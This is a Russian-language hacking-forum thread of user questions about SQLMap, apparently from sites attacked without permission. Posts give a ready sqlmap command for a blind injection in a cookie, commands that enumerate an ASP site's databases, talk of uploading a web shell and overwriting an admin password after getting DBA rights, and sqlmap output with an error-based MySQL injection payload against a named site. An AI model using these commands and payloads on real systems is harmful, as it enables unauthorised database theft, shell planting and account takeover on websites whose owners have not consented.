Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. zagruzkaaa

    zagruzkaaa New Member

    Joined:
    7 Jul 2009
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    если запускать несколько копий sqlmap на одной машине для разных сайтов - это ускорит работу?
     
  2. PoliGroS

    PoliGroS Member

    Joined:
    29 Mar 2012
    Messages:
    79
    Likes Received:
    8
    Reputations:
    0
    И тут -
    Как быть дальше?
     
  3. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Конечно. Главное что бы инет позволял, однако я призываю вас, всем, проводить самостоятельно эксперименты, и делится результатом с публикой.
     
    zagruzkaaa likes this.
  4. androd

    androd Banned

    Joined:
    16 Sep 2016
    Messages:
    19
    Likes Received:
    1
    Reputations:
    2
    Есть уязвимость в с сокет,точнее blind sqlini в сокет параметре
    Как сделать запрос к sqlmap что бы он начал крутить?)
    GET /url HTTP/1.1
    Cookie: checked=1; guest_id=(Тут СКУЛЯ)=000683%20or%20'bSI5RhDA'='; session=1000000000000111444833031088028731474956441558208322179665292278; dguid=_454657; XSRF-TOKEN=eyJpdiI6ImdQeG44V1NYTWF0bXNlaW1JeTdqZ1E9PSIsIm1hYyI6IjA4ZjIyZTAwZWQxZTg1MmY4NmUwYTg3NzMyNWY2Y2YzMjRlYWI2NWYzMDZlYjIwMGM2Nzc3M2QyYWU0ZTVhMTIiLCJ2YWx1ZSI6IjErVTg0MmJpR2tST0k5RERnZVFuMUtaajBPTkZLOVhzOVdydVJvckFSM2VSMWRIaE1nODZ0bVlwY2hwNXVlUFEwV0pPWjFNNUo3XC9VaG1raml2MW1MZz09In0=; laravel_session=eyJpdiI6ImdQeG44V1NYTWF0bXNlaW1JeTdqZ1E9PSIsIm1hYyI6IjA4ZjIyZTAwZWQxZTg1MmY4NmUwYTg3NzMyNWY2Y2YzMjRlYWI2NWYzMDZlYjIwMGM2Nzc3M2QyYWU0ZTVhMTIiLCJ2YWx1ZSI6IjErVTg0MmJpR2tST0k5RERnZVFuMUtaajBPTkZLOVhzOVdydVJvckFSM2VSMWRIaE1nODZ0bVlwY2hwNXVlUFEwV0pPWjFNNUo3XC9VaG1raml2MW1MZz09In0=
    X-Requested-With: XMLHttpRequest
    Referer: https://site.com:443/
    Host: https://site.com
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
    Accept: */*
     
    #244 androd, 27 Sep 2016
    Last edited: 27 Sep 2016
  5. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    --cookie="checked=1; guest_id=(Тут СКУЛЯ)=000683%20or%20'bSI5RhDA'='; session=1000000000000111444833031088028731474956441558208322179665292278; dguid=_454657; XSRF-TOKEN=eyJpdiI6ImdQeG44V1NYTWF0bXNlaW1JeTdqZ1E9PSIsIm1hYyI6IjA4ZjIyZTAwZWQxZTg1MmY4NmUwYTg3NzMyNWY2Y2YzMjRlYWI2NWYzMDZlYjIwMGM2Nzc3M2QyYWU0ZTVhMTIiLCJ2YWx1ZSI6IjErVTg0MmJpR2tST0k5RERnZVFuMUtaajBPTkZLOVhzOVdydVJvckFSM2VSMWRIaE1nODZ0bVlwY2hwNXVlUFEwV0pPWjFNNUo3XC9VaG1raml2MW1MZz09In0=; laravel_session=eyJpdiI6ImdQeG44V1NYTWF0bXNlaW1JeTdqZ1E9PSIsIm1hYyI6IjA4ZjIyZTAwZWQxZTg1MmY4NmUwYTg3NzMyNWY2Y2YzMjRlYWI2NWYzMDZlYjIwMGM2Nzc3M2QyYWU0ZTVhMTIiLCJ2YWx1ZSI6IjErVTg0MmJpR2tST0k5RERnZVFuMUtaajBPTkZLOVhzOVdydVJvckFSM2VSMWRIaE1nODZ0bVlwY2hwNXVlUFEwV0pPWjFNNUo3XC9VaG1raml2MW1MZz09In0=" -v 3 --level 3 --risk 3 -p guest_id
     
    _________________________
    BabaDook likes this.
  6. zagruzkaaa

    zagruzkaaa New Member

    Joined:
    7 Jul 2009
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    ну допустим я запустил копий 20, как понять - что добавление еще копий не ускорит работу, т.е интернет уже на пределе?
     
  7. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    wtf а треды тебе на что?

    Code:
    ~$ python sqlmap.py --help | grep threads
        --threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)
    
    если ты действительно имел ввиду то что спрашивал, то нет, количество копий для разных сайтов не ускорит работу о_О

    "ну допустим я запустил копий 20, как понять - что добавление еще копий не ускорит работу, т.е интернет уже на пределе?" узнай лимит канала своего провайдера, хотя даже 1-2мб ты запаришся забивать sqlmap'ом, скорее тебе пров атата скажет
     
    _________________________
  8. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    не типа, смотри, запускаем одно временно сканить 2 сканеров и 20 разных сайтов, типа это будет по скорости быстрее, чем сканить с начало 1 сайт, потом второй итд...
     
  9. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    сканеры независимо друг от друга будут работать, как "сканер 1" поймет что сайт "site.com" уже просканирован "сканером 2"? для это же придумали потоки и треды
     
    _________________________
  10. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    долго объяснять свою мысль, уже флуд будет
     
  11. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    такая же фигня, забили
     
    _________________________
  12. zagruzkaaa

    zagruzkaaa New Member

    Joined:
    7 Jul 2009
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    ну я имел ввиду чтобы сканеры запускать для разных сайтов) например создать отдельный список сайтов для каждого сканера
     
  13. sinfo

    sinfo Member

    Joined:
    3 Oct 2016
    Messages:
    21
    Likes Received:
    5
    Reputations:
    0
    Ничего не могу понять.
    [21:06:50] [INFO] testing if current user is DBA
    [21:06:50] [INFO] fetching current user
    [21:06:50] [INFO] resumed: root@localhost
    current user is DBA: True
    Пытаюсь залить шелл пишет
     
  14. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    ну рутовый юзер мускула ещё не рут в системе) может быть тупо прав на запись нет
     
    _________________________
  15. sinfo

    sinfo Member

    Joined:
    3 Oct 2016
    Messages:
    21
    Likes Received:
    5
    Reputations:
    0
    А с этими правами я могу перезаписать пасс админа?
     
  16. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Да. Откуда вы путь взяли? похоже что он не верный, вроде 13 ошибка говорит о том что папка недоступна для записи. Вообщем по логам понять ничего не могу.
    С начало у вас
    /home/ste/public_htm l/admin-ste/
    Потом /windows-tools/active- directory-manager/
     
  17. sinfo

    sinfo Member

    Joined:
    3 Oct 2016
    Messages:
    21
    Likes Received:
    5
    Reputations:
    0
    Это уже сам мап такое пишет
     
  18. sinfo

    sinfo Member

    Joined:
    3 Oct 2016
    Messages:
    21
    Likes Received:
    5
    Reputations:
    0
    --crawl=2 <- сканирование структуры сайта,Какое макс значение и есть описание допустим --crawl=1 - гет запросы --crawl=2 гет и пост и тд
     
  19. masterdolicjakov

    masterdolicjakov New Member

    Joined:
    17 Sep 2016
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Доброго всем времени суток!
    Парни, помогите решить одну проблемку...
    В общем суть дела:
    Есть сайт на ASP
    Нашел мапом две скули.
    Когда прошу чекнуть базу... Выползает огромный список баз в количестве около 120 штук. Хз что такое творится. Задавал пар. --current-db (user), показывало название базы и юзверя. Но вот колонки читать не хочет.
    Чекаю так:
    1. sqlmap.py -u site.com/site.aspx?s=104 --dbs --threads=10
    2. sqlmap.py -u site.com/site.aspx?s=104 -D Base --columns --no-cast --threads=10
    [​IMG]
    [​IMG]
     
  20. sinfo

    sinfo Member

    Joined:
    3 Oct 2016
    Messages:
    21
    Likes Received:
    5
    Reputations:
    0
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: #1* (URI)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: http://vapenw.com:80/catalogsearch/result/?cat=-3835) OR 1 GROUP BY
    CONCAT(0x716a7a7071,(SELECT (CASE WHEN (3882=3882) THEN 1 ELSE 0 END)),0x716a70
    7871,FLOOR(RAND(0)*2)) HAVING MIN(0)#&product_finished=52&q=1&rating=2
    ---
    [22:53:16] [INFO] testing MySQL
    [22:53:16] [WARNING] reflective value(s) found and filtering out
    [22:53:46] [WARNING] turning off pre-connect mechanism because of connection tim
    e out(s)
    [22:53:46] [CRITICAL] connection timed out to the target URL. sqlmap is going to
    retry the request(s)
    [22:55:16] [CRITICAL] connection timed out to the target URL

    пробывал с проски результата нуль(